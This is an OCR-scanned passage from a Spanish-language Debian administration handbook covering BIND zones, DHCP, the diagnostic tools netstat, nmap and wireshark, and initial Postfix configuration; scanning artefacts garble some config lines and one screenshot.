212.94.201.10 

@ 

IN 

MX 

5  mail 

@ 

IN 

MX 

10  mail2 

ns 

IN 

A 

212.94.201.10 

mail 

IN 

A 

212.94.201.10 

mail2 

IN 

A 

212.94.201.11 

WWW 

IN 

A 

212.94.201.11 

dns 

IN 

CNAME 

ns 

PRECAUCION  La  sintaxis  de  los  nombres  de  maquinas  deben  adherirse  a  reglas  estrictas.  Por  ejem- 
Sintaxis  de  un  nombre  pl°>  macluina  implica  maquina .  dominio.  Si  no  se  debe  agregar  el  nombre  de  domi- 

nio  a  un  nombre,  debe  escribir  dicho  nombre  como  maquina.  (con  un  punto  de 
sufijo).  Por  lo  tanto,  indicar  un  nombre  DNS  fuera  del  dominio  actual  necesita  una 
sintaxis  como  maquina .  ot  rodominio .  com .  (con  el  punto  final). 
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Ejemplo  10.14  Extracto  de  /etc/ bind/ db .  192 .168 


Zona  inversa  para  192.168.0.0/16 

admin.falcot.com.  =>  contacto  de  la  zona:  admin@falcot.com 


$TTL 

@ 


604800 

IN 


SOA 


ns.internal.falcot.com.  admin.falcot.com.  ( 


20040121 
604800 
86400 
2419200 
604800  ) 


Serial 

Refresco 

Reintento 

Expiracion 

TTL  de  cache  negativo 


IN 


NS 


ns . internal . f alcot . com . 


;  192.168.0.1  ->  arrakis 

1.0  IN  PTR  arrakis.internal.falcot.com. 

;  192.168.0.2  ->  neptune 

2.0  IN  PTR  neptune.internal.falcot.com. 

;  192.168.3.1  ->  pau 

1.3  IN  PTR  pau.internal.falcot.com. 


10.7.  DHCP 

DHCP  ( procolo  de  configuration  dinamica  de  equipos:  «Dynamic  Host  Configuration  Protocol)))  es  un 
protocolo  mediante  el  cual  una  maquina  puede  obtener  su  configuracion  de  red  automaticamen- 
te  al  iniciar.  Esto  permite  centralizar  la  administracion  de  las  configuraciones  de  redy  asegurar 
que  todos  los  equipos  de  escritorio  obtengan  configuraciones  similares. 

Un  servidor  DHCP  provee  muchos  parametros  relacionados  con  la  red.  Los  mas  comunes  son  una 
direccion  IP  y  la  red  a  la  que  pertenece  el  equipo,  pero  tambien  puede  proveer  otra  informacion 
como  servidores  DNS,  servidores  WINS,  servidores  NTPy  mas. 

El  Internet  Software  Consortium  (involucrado  tambien  en  el  desarrollo  de  bind)  es  el  autor  prin¬ 
cipal  del  servidor  DHCP.  El  paquete  Debian  correspondiente  es  isc-dhcp-server. 


10.7.1.  Configuracion 

El  primer  elemento  que  necesita  editar  en  el  archivo  de  configuracion  del  servidor  DHCP  (/etc/ 
dhcp/dhcpd .  conf)  son  el  nombre  de  dominio  y  servidores  DNS.  Si  el  servidor  es  el  unico  en 
la  red  local  (definido  en  la  propagacion  de  difusion),  de  activar  (o  descomentar)  la  directiva 
authoritative.  Tambien  necesita  crear  una  seccion  subnet  (subred)  describiendo  la  red  local  y  la 
informacion  de  configuracion  que  proveera.  El  siguiente  ejemplo  define  una  red  local  192.168.0. 
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0/24  con  un  router  en  192.168.0.1  como  puerta  de  enlace.  Las  direcciones  IP  disponibles  estan  en 
el  rango  192.168.0.128  a  192.168.0.254. 


Ejemplo  10.15  Extracto  de  /etc/ dhcp/ dhcpd .  conf 


# 

#  Archivo  de  configuracion  de  ejemplo  para  el  dhcpd  ISC  para  Debian 

# 

#  El  parametro  ddns-updates-style  controla  si  el  servidor  intentara  o  no 

#  una  actualizacion  de  DNS  cuando  se  confirme  la  asignacion.  Utilizamos 

#  el  comportamiento  predeterminado  de  la  version  2  de  paquetes  ('none', 

#  ya  que  DHCP  v 2  no  era  compatible  con  DDNS). 
ddns-update-style  interim; 

#  Definicion  de  opciones  comunes  a  todas  las  redes... 
option  domain-name  "internal.falcot.com"; 

option  domain-name-servers  ns.internal.falcot.com; 

default-lease-time  600; 
max-lease-time  7200; 

#  Si  este  servidor  DHCP  es  el  servidor  DHCP  oficial  para  la  red  local, 

#  debe  descomentar  la  directiva  «authoritative» . 
authoritative; 

#  Utilice  esto  para  enviar  mensajes  de  registro  dhcp  a  un  archivo  de 

#  registro  distinto  (tambien  debera  modificar  syslog.conf  para  completar 

#  la  redireccion) . 
log-facility  local7; 

#  Mi  subred 

subnet  192.168.0.0  netmask  255.255.255.0  { 
option  routers  192.168.0.1; 
option  broadcast-address  192.168.0.255; 
range  192.168.0.128  192.168.0.254; 
ddns-domainname  "internal . falcot . com" ; 

} 


10.7.2.  DHCP  y  DNS 

Una  buena  funcionalidad  es  el  registro  automatizado  de  clientes  DHCP  en  la  zona  DNS  para  que 
cada  maquina  obtenga  un  nombre  significativo  (en  lugar  de  algo  impersonal  como  maquina-192- 
168-0-131.internal.falcot.com).  Para  utilizar  esta  funcionalidad  necesita  configurar  el  servidor 
DNS  para  que  acepte  actualizaciones  de  la  zona  DNS  internal.falcot.com  desde  el  servidor  DHCP 
y  configurar  este  ultimo  para  que  envie  actualizaciones  para  cada  registracion. 
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En  el  caso  de  bind,  necesita  agregar  la  directiva  allow-update  a  cada  una  de  las  zonas  que  puede 
editar  el  servidor  DHCP  (solo  el  dominio  internal.falcot.com  y  su  zona  inversa).  Esta  directiva 
enumera  las  direcciones  IP  que  pueden  realizar  estas  actualizaciones;  por  lo  tanto  debera  incluir 
las  posibles  direcciones  del  servidor  DHCP  (tanto  la  direccion  local  como  la  direccion  publica  en 
caso  que  sea  apropiado). 

allow-update  {  127.0.0.1  192.168.0.1  212.94.201.10  !any  }; 

jTenga  cuidado!  Una  zona  que  pueda  ser  modificada  sera  modificada  por  bind,  y  este  ultimo 
sobreescribira  sus  archivos  de  configuracion  en  intervalos  regulares.  Debido  a  que  este  proce- 
dimiento  automatizado  genera  archivos  que  son  menos  legibles  que  aquellos  escritos  manual- 
mente,  los  administradores  deFalcot  administran  el  dominio  internal.falcot.com  con  un  servidor 
DNS  delegado;  esto  significa  que  el  archivo  de  la  zona  falcot.com  se  mantiene  firmemente  bajo 
su  control  manual. 

El  extracto  de  la  configuracion  del  servidor  DHCP  anterior  ya  incluye  las  directivas  necesarias 
para  las  actualizaciones  de  la  zona  DNS:  son  las  lineas  ddns-update-style  interim;y  ddns-domain- 
name  ’’internal.falcot.com”;  en  el  bloque  que  describe  la  subred. 


10.8.  Herramientas  de  diagnostico  de  red 

Cuando  una  aplicacion  de  red  no  funciona  como  esperamos  es  importante  poder  ver  «bajo  el 
capo».  Aun  cuando  todo  parezca  estar  funcionando,  realizar  un  diagnostico  de  red  puede  ayudar 
a  asegurar  que  todo  esta  funcionando  como  debe.  Existen  muchas  herramientas  de  diagnostico 
para  este  proposito,  cada  una  de  las  cuales  opera  en  un  nivel  diferente. 


10.8.1.  Diagnostico  local:  netstat 

Mencionemos  primero  el  programa  netstat  (en  el  paquete  net-tools );  muestra  un  resumen  ins- 
tantaneo  de  la  actividad  de  red  de  una  maquina.  Cuando  lo  ejecute  sin  parametros,  mostrara 
todas  las  conexiones  abiertas;  esta  lista  puede  ser  demasiado  detallada  ya  que  incluye  muchos 
zocalos  de  dominio  Unix  (utilizados  ampliamente  por  demonios)  que  no  incluyen  la  red  en  ab¬ 
solute  (por  ejemplo,  la  comunicacion  de  dbus,  trafico  XII  y  comunicaciones  entre  sistemas  de 
archivos  virtuales  y  el  escritorio). 

Por  lo  tanto,  invocaciones  usuales  utilizan  opciones  que  modifican  el  comportamiento  de  nets 
tat.  Las  opciones  utilizadas  mas  frecuentemente  incluyen: 

■  -t,  que  filtra  los  resultados  para  incluir  solamente  conexiones  TCP; 

■  -u,  que  realiza  algo  similar  por  las  conexiones  UDP;  estas  opciones  no  son  mutuamente 
excluyentes  y  una  de  ellas  es  suficiente  para  evitar  mostrar  informacion  sobre  conexiones 
de  dominio  Unix; 

■  -a,  para  mostrar  tambien  los  zocalos  que  estan  escuchando  (que  esperan  conexiones  en- 
trantes); 
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■  -n,  para  mostrar  los  resultados  numericamente:  direcciones  IP  (sin  resolucion  DNS),  nu- 
meros  de  puerto  (sin  alias  definidos  en  /etc/services) y  IDs  de  usuario  (sin  nombres  de 
usuario); 

■  -p,  enumerar  los  procesos  involucrados;  esta  opcion  solo  es  util  cuando  ejecute  netstat 
como  root  ya  que  los  usuarios  normales  solo  veran  sus  propios  procesos; 

■  -c,  para  actualizar  continuamente  la  lista  de  conexiones. 

Otras  opciones,  documentadas  en  la  pagina  de  manual  netstat  (8),  proveen  un  control  mas 
granular  en  los  resultados  mostrados.  En  la  practicajas  primeras  cinco  opciones  son  utilizadas 
juntas  tan  seguido  que  los  administradores  de  sistemas  y  red  tiene  el  acto  reflejo  de  ejecutar 
netstat  -tupan.  Los  resultados  tipicos,  en  una  maquina  con  poca  carga,  pueden  parecerse  alo 
siguiente: 

#  netstat  -tupan 

Conexiones  activas  de  Internet  (servidores  y  establecidas) 

Proto  Reciv-Q  Enviado-Q  Direccion  Local  Direccion  externa  Estado  PID/Nombre  programa 


tcp 

0 

0 

0.0.0.0:111 

0.0. 0.0:* 

LISTEN 

397/rpcbind 

tcp 

0 

0 

0.0.0.0:22 

0.0. 0.0:* 

LISTEN 

431/sshd 

tcp 

0 

0 

0.0.0.0:36568 

0.0. 0.0:* 

LISTEN 

407/rpc . statd 

tcp 

0 

0 

127.0.0.1:25 

0.0. 0.0:* 

LISTEN 

762/exim4 

tcp 

0 

272 

192.168.1.242:22 

192.168.1.129:44452 

ESTABLISHED 

1172/sshd:  roland 

[ 

tcp6 

0 

0 

:  :  111 

:  :  :  * 

LISTEN 

397/rpcbind 

tcp6 

0 

0 

:  :  :  22 

:  :  :  * 

LISTEN 

431/sshd 

tcp6 

0 

0 

: : 1:25 

:  :  :  * 

LISTEN 

762/exim4 

tcp6 

0 

0 

: : : 35210 

:  :  :  * 

LISTEN 

407/rpc . statd 

udp 

0 

0 

0.0.0.0:39376 

0.0. 0.0:* 

916/dhclient 

udp 

0 

0 

0.0.0.0:996 

0.0. 0.0:* 

397/rpcbind 

udp 

0 

0 

127.0.0.1:1007 

0.0. 0.0:* 

407/rpc . statd 

udp 

0 

0 

0.0.0.0:68 

0.0. 0.0:* 

916/dhclient 

udp 

0 

0 

0.0.0.0:48720 

0.0. 0.0:* 

45 1/avahi- daemon : 

r 

udp 

0 

0 

0.0.0.0:111 

0.0. 0.0:* 

397/rpcbind 

udp 

0 

0 

192.168.1.242:123 

0.0. 0.0:* 

539/ntpd 

udp 

0 

0 

127.0.0.1:123 

0.0. 0.0:* 

539/ntpd 

udp 

0 

0 

0.0.0.0:123 

0.0. 0.0:* 

539/ntpd 

udp 

0 

0 

0.0.0.0:5353 

0.0. 0.0:* 

45 1/avahi -daemon : 

r 

udp 

0 

0 

0.0.0.0:39172 

0.0. 0.0:* 

407/rpc. statd 

udp6 

0 

0 

: : :996 

:  :  :  * 

397/rpcbind 

udp6 

0 

0 

: : : 34277 

:  :  :  * 

407/rpc . statd 

udp6 

0 

0 

: : : 54852 

:  :  :  * 

916/dhclient 

udp6 

0 

0 

:  :  111 

:  :  :  * 

397/rpcbind 

udp6 

0 

0 

: : : 38007 

:  :  :  * 

45 1/avahi -daemon : 

r 

udp6 

0 

0 

f e80 : : 5054 : f f : fe99 : 

123  :::* 

539/ntpd 

udp6 

0 

0 

2001 : bc8 : 3a7e : 210 : a 

123  :::* 

539/ntpd 

udp6 

0 

0 

2001 : bc8 : 3a7e : 210 : 5 

123  :::* 

539/ntpd 

udp6 

0 

0 

:: 1:123 

:  :  :  * 

539/ntpd 

udp6 

0 

0 

: : : 123 

:  :  :  * 

539/ntpd 

udp6 

0 

0 

: : : 5353 

:  :  :  * 

45 1/avahi -daemon : 

r 

Como  es  esperado,  enumera  las  conexiones  establecidas:  dos  conexiones  SSH  en  este  caso  y  las 
aplicaciones  esperando  conexiones  entrantes  (mostradas  como  LISTEN),  notablemente  el  servi- 
dor  de  correo  Exim4  esta  escuchando  en  el  puerto  25. 


10.8.2.  Diagnostico  remoto:  nmap 


nmap  (en  el  paquete  del  mismo  nombre)  es,  en  cierta  forma,  el  equivalente  remoto  de  netstat. 
Puede  escanear  un  conjunto  de  puertos  «muy  conocidos»  de  uno  o  mas  servidores  remotos  y 
enumerar  los  puertos  donde  encontro  una  aplicacion  que  responda  conexiones  entrantes.  Lo 
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que  es  mas,  nmap  puede  identificar  alguna  de  estas  aplicaciones,  a  veces  inclusive  tambien  su 
numero  de  version.  La  desventaja  de  esta  herramienta  es  que,  debido  a  que  ejecuta  de  forma 
remota,  no  puede  proveer  informacion  sobre  procesos  o  usuarios;  sin  embargo,  puede  trabajar 
con  varios  objetivos  al  mismo  tiempo. 

Una  invocacion  de  nmap  tipica  utilizara  la  opcion  -A  (para  que  nmap  intente  identificar  las  ver- 
siones  del  software  de  servidor  que  encuentre)  seguido  de  una  o  mas  direcciones  IP  o  nombres 
DNS  de  los  equipos  a  escanear.  Nuevamente,  existen  muchas  mas  opciones  que  proveen  un  con¬ 
trol  detallado  del  comportamiento  de  nmap;  revise  la  documentacion  en  la  pagina  de  manual 
nmap(l). 

#  nmap  mirtuel 

Starting  Nmap  6.47  (  http://nmap.org  )  at  2015-03-09  16:46  CET 
Nmap  scan  report  for  mirtuel  (192.168.1.242) 

Host  is  up  (0.000013s  latency). 

rDNS  record  for  192.168.1.242:  mirtuel.internal.placard.fr.eu.org 

Not  shown:  998  closed  ports 

PORT  STATE  SERVICE 

22/tcp  open  ssh 

111/tcp  open  rpcbind 

Nmap  done:  1  IP  address  (1  host  up)  scanned  in  2.41  seconds 

#  nmap  -A  localhost 

Starting  Nmap  6.47  (  http://nmap.org  )  at  2015-03-09  16:46  CET 
Nmap  scan  report  for  localhost  (127.0.0.1) 

Host  is  up  (0.000013s  latency). 

Other  addresses  for  localhost  (not  scanned):  127.0.0.1 
Not  shown:  997  closed  ports 
PORT  STATE  SERVICE  VERSION 

22/tcp  open  ssh  OpenSSH  6.7pl  Debian  3  (protocol  2.0) 

|  ssh-hostkey:  ERROR:  Script  execution  failed  (use  -d  to  debug) 

25/tcp  open  smtp  Exim  smtpd  4.84 

|  smtp-commands :  mirtuel  Hello  localhost  1127.0.0.1],  SIZE  52428800,  8BITMIME, 
PIPELINING,  HELP, 

|_  Commands  supported:  AUTH  HELO  EHLO  MAIL  RCPT  DATA  NOOP  QUIT  RSET  HELP 
111/tcp  open  rpcbind  2-4  (RPC  #100000) 

|  rpcinfo: 


!  program 

version 

port/proto 

service 

|  100000 

2,3,4 

111/tcp 

rpcbind 

|  100000 

2,3,4 

111/udp 

rpcbind 

|  100024 

1 

36568/tcp 

status 

|  100024 

1 

39172/udp 

status 

Device  type 

general 

purpose 

Running:  Linux  3.X 

OS  CPE:  cpe : /o : linux : 

linux  kernel 

3 

OS  details: 

Linux  3.7 

-  3.15 

Network  Distance:  0  hops 
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Service  Info:  Host:  mirtuel;  OS:  Linux;  CPE:  cpe : /o : Linux : linuxkernel 

OS  and  Service  detection  performed.  Please  report  any  incorrect  results  at  http 
://nmap.org/submit/  . 

Nmap  done:  1  IP  address  (1  host  up)  scanned  in  11.54  seconds 


Como  es  esperado,  se  muestran  las  aplicaciones  SSH  y  Exim4.  Sepa  que  no  todas  las  aplicaciones 
escuchan  en  todas  las  direcciones  IP;  debido  a  que  solo  se  puede  acceder  a  Exim4  mediante  la 
interfaz  de  «loopback»  lo,  solo  aparecera  durante  un  analisis  de  localhost  pero  no  cuando  se 
escanea  mirtuel  (asociado  con  la  interfaz  ethO  del  mismo  equipo). 


10.8.3.  «Sniffers»:  tcpdump  y  wireshark 


A  veces  uno  necesita  revisar  lo  que  sucede  literalmente  en  el  cable,  paquete  por  paquete.  Estos 
casos  requieren  un  «analizador  de  tramas»,  mas  comunmente  conocidos  como  «sniffers».  Estas 
herramientas  observan  todos  los  paquetes  en  una  interfaz  de  red  dada  y  los  muestran  en  una 
forma  mas  amigable. 

La  herramienta  de  culto  en  este  ambito  es  tcpdump,  disponible  como  una  herramienta  estandar 
en  un  amplio  rango  de  plataformas.  Permite  muchos  tipos  de  capturas  de  trafico  de  red,  pero  la 
representacion  del  mismo  es  bastante  criptica.  Por  lo  tanto  no  la  describiremos  en  mas  detalle. 

Una  herramienta  mas  reciente  (y  mas  moderna),  wireshark  (en  el  paquete  wireshark),  se  ha 
convertido  en  la  nueva  referencia  de  analisis  de  trafico  de  red  debido  a  sus  modulos  de  decodifi- 
cacion  que  permiten  un  analisis  simplificado  de  los  paquetes  capturados.  Muestra  los  paquetes 
graficamente,  organizados  basandose  en  las  capas  de  protocolos.  Esto  permite  al  usuario  visuali- 
zar  todos  los  protocolos  involucrados  en  un  paquete.  Por  ejemplo,  en  un  paquete  que  contenga 
un  pedido  HTTP,  wi resha  rk  mostrara  por  separado  la  informacion  sobre  la  capa  ffsica,  la  capa 
Ethernet,  la  informacion  IP  del  paquete,  los  parametros  de  conexion  TCP  y  finalmente  el  pedido 
HTTP  mismo. 
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Capturing  from  ethO  [Wireshark  1.12.1  (Git  Rev  Unknown  from  unknown)] 


File  Edit  View  Go  Capture  Analyze  Statistics  Telephony  Tools  Internals  Help 

©  ®  ■  i2  D  X  Q  <$»  ii  iSSH 


Filter.  Itcp.port  ==  22  ^  |  Expression...  Clear  Apply  Save 

No.  Time  Source  Destination  Protocol  Length  Info 

117  2.921505000  2001 : bc8: 3a7e : 200: : 1  2001 :bc8:3a7e: 210: a8a< TCP  94  80-32811  [SYN,  ACK]  Seq=0  Ack=l  Win=14480  Lei 

118  2.921588000  2001 : bc8: 3a7e: 210: a8a‘  2001: bc8: 3a 7e: 200: : 1  TCP  86  32811-80  [ACK]  Seq=l  Ack=l  Win=28800  Len=0  T! 


119  2.923730000  2001 : bc8: 3a7e: 210: a8a$  2001 :bc8: 3a7e:200: : 1  HTTP  390  GET  /  HTTP/1.1 

120  2.945033000  2a00: 1450: 4007: 808:  :  1C  2001 : bc8: 3a7e : 210: a8a‘ TLSvl .2  1294  [TCP  Previous  segment  not  captured]  Continua 

_  -  _ 


17?  7  Q7»~?a?nnn  7nm  ■hr-»-'3a7o-7fW  ■  1 ?nm  ■  hrR-  "3a7n  ■  710-  aRaC  TCP _  RR  Rn-R7R1 1  r  arxl  Ron=1  flrlt=RnR  w-i  n=l  RR1  R  I  on=fl 


©w  Frame  (frame),  390  bytes  Packets:  733  Displayed:  733  (100.0%)  Profile:  Default 


Figura  10.1  El  analizador  de  trafico  de  red  wireshark 


En  nuestro  ejemplo,  filtramos  los  paquetes  que  viajan  sobre  SSH  (con  el  filtro  Itcp.port  ==22).  El 
paquete  mostrado  tiene  expandida  la  capa  HTTP. 


SUCERENCIA  Cuando  no  podemos  ejecutar  una  interfaz  grafica,  o  por  cualquier  razon  no  desea- 
wireshark  sin  interfaz  mos  hacerlo,  existe  una  version  solo  de  texto  de  wireshark  bajo  el  nombre  tshark 
grafica"  tshark  !en  Paquete  independiente  tshark).  La  mayoria  de  la  funcionalidad  de  captura  y 
decodificacion  esta  tambien  disponible,  pero  la  falta  de  interfaz  grafica  limita  ne- 
cesariamente  la  interaccion  con  el  programa  (filtrar  paquetes  luego  de  capturarlos, 
rastrear  una  conexion  TCP,  etc.).  Puede  utilizarse,  sin  embargo,  como  primer  inten- 
to.  Si  desea  realizar  manipulaciones  y  necesita  la  interfaz  grafica,  puede  guardar 
los  paquetes  en  un  archivo  y  cargarlo  en  un  wireshark  grafico  ejecutando  en  otra 
maquina. 
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Palabras  clave 


Postfix 

Apache 

NFS 

Samba 

Squid 

OpenLDAP 

SIP 


Capftulo 


Servicios  de  red: 
Postfix,  Apache, 
NFS,  Samba,  Squid, 
LDAP,  SIP,  XMPP, 

TURN 


Contenidos 

Servidor  de  correo  268  Servidor  web  (HTTP)  285  Servidor  de  archivos  FTP  293 
Servidor  de  archivos  NFS  294  Configuracion  de  espacios  compartidos  Windows  con  Samba  297 

Proxy  HTTP/FTP  300  Directorio  LDAP  302  Servicios  de  comunicacion  en  tiempo  real  31 1 


Los  servicios  de  red  son  los  programas  con  los  que  los  usuarios  interactuan  en  su  trabajo  diario.  Son  la 
punta  del  iceberg  del  sistema  de  informaciony  este  capitulo  se  centra  en  ellos;  las  partes  ocultas  en  las 
que  se  basan  son  la  infraestructura  queya  hemos  descripto  anteriormente. 

Muchos  servicios  de  red  modemos  requieren  tecnologia  de  cifrado  para  operar  de  forma  confiabley 
segura,  especialmente  cuando  son  usados  de  forma  publica  en  internet.  Los  certificados  X.509  (a  los 
cuales  se  conoce  tambien  como  Certificados  SSL  o  Certificados  TLS)  se  usan  comunmente  para  esta 
finalidad.  Un  certificado  para  un  dominio  concreto  se  comparte  entre  mas  de  un  servicio  de  los  que 
discutiremos  a  lo  largo  de  este  capitulo. 


11.1  Servidor  de  correo 


Los  administradores  de  Falcot  Corp  eligieron  Postfix  como  servidor  de  correo  electronico  debido 
a  su  fiabilidad  y  su  facilidad  de  configuracion.  De  hecho,  su  diseno  fuerza  a  que  cada  tarea  sea 
implementada  en  un  proceso  con  el  mi'nimo  conjunto  de  permisos,  lo  que  es  una  gran  medida 
paliativa  contra  problemas  de  seguridad. 


ALTERNATIVA 

Debian  utiliza  Exim4  como  servidor  de  correo  predeterminado  (razon  por  la  que  la 

El  servidor  Exim4 

instalacion  inicial  incluye  Exim4).  Un  paquete  diferente  provee  su  configuracion, 
exim4-config ,  la  cual  es  personalizada  automaticamente  basandose  en  las  respues¬ 
tas  a  un  conjunto  de  preguntas  Debconf  muy  similares  a  las  que  pregunta  el  paque¬ 
te  postfix. 

La  configuracion  puede  estar  en  un  unico  archivo  (/etc/exim4/exim4 .  conf . 
template)  o  dividida  en  diferentes  trozos  que  se  almacenan  en  el  directorio 
/etc/exim4/conf .  d/.  En  ambos  casos,  update-exim4 .  conf  utiliza  los  archivos 
como  plantillas  para  generar  /var/lib/exim4/config . autogenerated  .  Exim4 
utiliza  este  ultimo  archivo.  Gracias  a  este  mecanismo,  se  pueden  introducir  los 
valores  definidos  durante  la  configuracion  debconf  de  Exim  —  almacenados  en 
/etc/exim4/ update  -  exim4 . conf.  conf  —  en  el  archivo  de  configuracion  de  Exim 
aun  cuando  el  administrador  y  otro  paquete  haya  modificado  la  configuracion  pre- 
determinada  de  Exim. 

La  sintaxis  de  los  archivos  de  configuracion  de  Exim4  tiene  sus  peculiaridades  y 
curva  de  aprendizaje.  Sin  embargo,  una  vez  que  se  entienden  estas  peculiaridades, 
Exim4  resulta  ser  un  servidor  de  correo  muy  completo  y  potente,  como  se  puede 
apreciar  en  las  decenas  de  paginas  de  documentacion. 

•-  http://www.exim.org/docs.html 

11.1.1.  Instalacion  de  Postfix 

El  paquete  postfix  incluye  el  demonio  SMTP  principal.  Otros  paquetes  (como  postfix-ldap  y  postfix- 
pgsql )  anaden  funcionalidad  adicional,  incluyendo  el  acceso  a  bases  de  datos.  Solo  debe  instalar- 
los  si  sabe  que  los  necesitara. 

VOLVER  A  LOS  CIMIENTOS 

SMTP  (protoclo  sencillo  de  transferencia  de  correo:  «Simpte  Mail  Transfer  Pro- 

SMTP 

tocol»)  es  el  protocolo  que  utilizan  los  servidores  de  correo  para  intercambiar  y 
enrutar  los  correos  electronicos. 

Durante  la  instalacion  del  paquete  se  realizan  varias  preguntas  Debconf.  Las  respuestas  permi- 
ten  crear  una  primera  version  del  archivo  de  configuracion  /etc/postf  ix/main  .  cf. 

La  primera  pregunta  es  sobre  el  tipo  de  instalacion.  Solamente  dos  de  las  respuestas  propuestas 
son  relevantes  en  caso  de  tener  un  servidor  conectado  a  Internet:  «Sitio  de  Internet»  e  «Internet 
con  smarthost».  La  primera  es  apropiada  para  un  servidor  que  recibe  correo  entrante  y  envia  el 
correo  saliente  directamente  a  los  destinatarios,  y  por  lo  tanto  se  adapta  al  caso  del  Falcot  Corp. 
La  segunda  es  apropiada  para  un  servidor  que  recibe  correo  de  forma  normal  pero  que  envia 
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el  correo  saliente  a  traves  de  otro  servidor  SMTP  intermedio  —  el  «smarthost»  —  en  lugar  de 
enviarlo  directamente  al  servidor  de  los  destinatarios.  Esto  es  especialmente  util  para  individuos 
con  una  direccion  IP  dinamica  puesto  que  muchos  servidores  de  correo  rechazan  los  mensajes 
que  vienen  desde  este  tipo  de  direccion.  En  este  caso,  el  smarthost  es  normalmente  el  servidor 
SMTP  del  ISP  que  siempre  suele  estar  configurado  para  aceptar  los  correos  provenientes  de  sus 
clientes  y  reenviarlos  correctamente.  Este  tipo  de  instalacion  (con  un  smarthost)  tambien  es  util 
para  servidores  que  no  esten  conectados  permanentemente  a  Internet  puesto  que  impide  tener 
que  gestionar  una  cola  de  mensajes  no  entregables  que  tienen  que  volver  a  ser  enviados  mas 
tarde. 


VOCABULARIO  ISP  es  la  sigla  de  «Proveedor  de  servicios  de  lnternet»  («lnternet  Service  Provider*). 

ISP  Se  trata  de  una  entidad,  a  menudo  una  empresa  comercial,  que  proporciona  cone- 
xiones  de  Internet  y  los  servicios  basicos  asociados  (correo  electronico,  noticias, 
etc.). 


La  segunda  pregunta  es  sobre  el  nombre  completo  de  la  maquina  y  se  utiliza  para  generar  las 
direcciones  de  correo  a  partir  de  los  nombres  de  usuario  locales;  el  nombre  completo  de  la  ma¬ 
quina  se  convierte  en  la  parte  de  la  direccion  que  sigue  a  la  arroba  («@»).  En  el  caso  de  Falcot, 
la  respuesta  deberia  ser  mail.falcot.com.  Esta  es  la  unica  pregunta  que  se  hace  de  forma  prede- 
terminada,  pero  la  configuracion  que  genera  no  es  lo  suficientemente  completa  para  las  necesi- 
dades  de  Falcot,  por  lo  que  los  administradores  deben  ejecutar  dpkg-  reconfigure  para  poder 
personalizar  mas  parametros. 

Una  de  las  preguntas  adicionales  pide  los  nombres  de  los  dominios  relacionados  con  la  maquina. 
La  lista  inicial  incluye  su  nombre  completo  asi  como  tambien  algunos  sinonimos  de  localhost, 
pero  el  dominio  principal  falcot.com  tiene  que  ser  agregado  de  forma  manual.  En  general  se 
deberian  anadir  todos  los  dominios  para  los  que  esta  maquina  debe  ejercer  como  servidor  MX; 
en  otras  palabras,  todos  los  dominios  para  los  cuales  el  DNS  anuncie  que  esta  maquina  acep- 
tara  correo.  Esta  informacion  acaba  siendo  escrita  en  la  variable  mydestination  del  archivo  de 
configuracion  principal  de  Postfix  —  /etc/postf  ix/main .  cf. 


EXTRA  Cuando  no  existe  un  registro  MX  para  un  dominio  en  DNS,  el  servidor  de  correo 
Consulta  de  los  registros  intentara  enviar  el  mensaje  a  la  direccion  del  equipo  directamente,  utilizando  para 
MX  ello  el  registro  A  (o  AAAA  en  IPv6). 


Capftulo  1 1  —  Servicios  de  red:  Postfix,  Apache,  NFS,  Samba,  Squid,  LDAP,  SIP,  XMPP,  TURN 
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Correo  para  jean@domain.com 


EHLO  mail.falcot.com 

MAIL  FROM:  <serge@falcot.com> 

RCPTTO:  <jean@domain.com> 

DATA 

[•■•] 

Subject:  Quedemos 

Hoi  a  Jean, 

[•••] 


Figura  11.1  Rot  del  registro  DNS  MX  al  enviar  un  correo 


En  algunos  casos,  la  instalacion  tambien  puede  preguntar  desde  que  redes  se  permitira  enviar 
correo  a  traves  de  la  maquina.  En  la  configuracion  predeterminada,  Postfix  unicamente  acepta 
correos  que  provengan  desde  la  propia  maquina;  normalmente  agregara  la  red  local.  Los  ad- 
ministradores  de  Falcot  Corp  anadieron  la  red  192.168.0.0/16  al  valor  predeterminado.  Si  no  se 
realiza  esta  pregunta  durante  la  instalacion,  la  variable  de  configuracion  correspondiente  es 
mynetworks,  tal  y  como  puede  verse  en  el  ejemplo  siguiente. 

El  correo  local  tambien  puede  ser  entregado  mediante  procmail.  Esta  herramienta  permite  a 
los  usuarios  clasificar  su  correo  en  funcion  de  reglas  contenidas  en  su  archivo  -/ .  p  rocmail  rc. 

Despues  de  este  paso,  los  administradores  obtuvieron  el  siguiente  archivo  de  configuracion;  se¬ 
ra  usado  en  las  siguientes  secciones  como  punto  de  partida  para  agregar  alguna  funcionalidad 
adicional. 


Ejemplo  11.1  Archivo  /etc/ postfix/main .  cf  inicial 


#  Revise  /usr/share/postfix/main . cf . dist  para  una  version  completa 

#  y  con  comentarios 

#  Especifico  a  Debian:  determine  el  nombre  del  archivo  cuya 

#  primera  linea  sera  utilizada  como  nombre.  El  valor  predeterminado 

#  en  Debian  es  /etc/mailname . 

#myorigin  =  /etc/mailname 

smtpdbanner  =  $myhostname  ESMTP  $mail_name  (Debian/GNU) 
biff  =  no 
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#  agragar  .dominio  es  trabajo  del  MUA. 
appenddotmydomain  =  no 

#  Descomente  la  siguiente  linea  para  generar  advertencias  sobre 

#  «correo  demorado» 

#delay_warning_time  =  4h 

readmedirectory  =  no 

#  Parametros  TLS 

smtpdtlscert  f ile=/etc/ssl/certs/ssl-cert-snakeoil . pem 
smtpd  tlskey  file=/etc/ssl/private/ssl - cert-snakeoil . key 
smtpd  use_tls=yes 

smtpd  tlssession  cache  database  =  btree : ${data_directory}/smtpd_scache 
smtp  tls  sessioncachedatabase  =  bt  ree : ${data_di recto ry}/smtp_s cache 

#  Revise  /usr/share/doc/postfix/TLS_README.gz  en  el  paquete  postfix-doc 

#  para  mas  informacion  sobre  como  habilitar  SSL  en  el  cliente  smtp. 

smtpdrelayrestrictions  =  permit  my networks  permitsaslauthenticated 
deferunauthdestination 
myhostname  =  mail.falcot.com 
alias  maps  =  hash : /etc/aliases 
alias  database  =  hash : /etc/aliases 
myorigin  =  /etc/mailname 

mydestination  =  mail.falcot.com,  falcot.com,  localhost . localdomain ,  localhost 
relayhost  = 

mynetworks  =  127.0.0.0/8  [ : : f f f f : 127 . 0 . 0 . 0]/104  [::1]/128  192.168.0.0/16 

mailboxcommand  =  procmail  -a  "$EXTENSION" 

mailboxsizelimit  =  0 

recipientdelimiter  =  + 

inetinterfaces  =  all 

inetprotocols  =  all 


SEGURIDAD  Los  certificados  snake  oil ,  al  igual  que  [os  medicamentos  vendidos  por  charlatanes 

